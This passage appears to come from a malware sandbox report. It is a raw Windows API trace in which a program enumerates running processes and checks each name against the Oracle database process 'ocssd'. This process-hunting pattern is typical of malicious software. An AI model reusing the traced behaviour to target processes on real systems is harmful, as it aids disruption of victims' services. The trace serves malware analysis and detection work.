dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0092.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.462] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3542f18 [0092.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3542f18, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0092.462] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0092.462] StrStrIA (lpFirst="Memory Compression", lpSrch="ocssd") returned 0x0 [0092.462] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0092.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0092.463] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3542ff8 [0092.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3542ff8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0092.464] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0092.464] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="ocssd") returned 0x0 [0092.464] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0092.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.465] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3544528 [0092.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3544528, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0092.465] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0092.465] StrStrIA (lpFirst="SearchUI.exe", lpSrch="ocssd") returned 0x0 [0092.465] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0092.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.466] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3543018 [0092.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3543018, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0092.466] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0092.467] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="ocssd") returned 0x0 [0092.467] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0092.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.468] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35444e0 [0092.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35444e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0092.468] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0092.468] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="ocssd") returned 0x0 [0092.468] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0092.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.469] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544540 [0092.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3544540, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0092.469] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0092.469] StrStrIA (lpFirst="pending.exe", lpSrch="ocssd") returned 0x0 [0092.469] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0092.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0092.471] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x353c268 [0092.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x353c268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0092.471] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0092.471] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="ocssd") returned 0x0 [0092.471] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0092.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.472] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3543478 [0092.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3543478, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0092.472] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0092.472] StrStrIA (lpFirst="swing prefer.exe", lpSrch="ocssd") returned 0x0 [0092.472] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0092.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0092.474] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x353c2e0 [0092.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x353c2e0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0092.474] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0092.474] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="ocssd") returned 0x0 [0092.474] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0092.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.475] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35431d8 [0092.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x35431d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0092.475] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0092.475] StrStrIA (lpFirst="nights-attending.exe", lpSrch="ocssd") returned 0x0 [0092.475] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0092.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.477] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3544558 [0092.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3544558, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0092.477] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0092.477] StrStrIA (lpFirst="installed.exe", lpSrch="ocssd") returned 0x0 [0092.477] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0092.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0092.478] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x35668e0 [0092.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x35668e0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0092.478] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0092.478] StrStrIA (lpFirst="references compounds.exe", lpSrch="ocssd") returned 0x0 [0092.479] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0092.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.480] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3543498 [0092.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x3543498, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0092.480] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0092.480] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="ocssd") returned 0x0 [0092.480] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0092.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.481] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3543438 [0092.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3543438, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0092.481] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0092.481] StrStrIA (lpFirst="registered try.exe", lpSrch="ocssd") returned 0x0 [0092.481] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0092.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0092.483] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x35666b0 [0092.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x35666b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0092.483] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0092.483] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="ocssd") returned 0x0 [0092.483] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0092.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.484] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35444f8 [0092.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x35444f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0092.484] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0092.484] StrStrIA (lpFirst="invite.exe", lpSrch="ocssd") returned 0x0 [0092.484] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0092.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.486] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35444c8 [0092.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x35444c8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0092.486] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0092.486] StrStrIA (lpFirst="idol.exe", lpSrch="ocssd") returned 0x0 [0092.486] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0092.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0092.592] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566728 [0092.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3566728, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0092.592] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0092.592] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="ocssd") returned 0x0 [0092.592] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0092.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.593] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3566548 [0092.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x3566548, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0092.593] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0092.594] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="ocssd") returned 0x0 [0092.594] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0092.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.595] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35444b0 [0092.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x35444b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0092.595] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0092.595] StrStrIA (lpFirst="powell_jane.exe", lpSrch="ocssd") returned 0x0 [0092.595] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0092.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.597] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35433f8 [0092.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x35433f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0092.597] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0092.597] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="ocssd") returned 0x0 [0092.597] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0092.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.598] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3544510 [0092.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3544510, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0092.598] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0092.598] StrStrIA (lpFirst="gainedshape.exe", lpSrch="ocssd") returned 0x0 [0092.598] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0092.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.599] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35431b8 [0092.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x35431b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 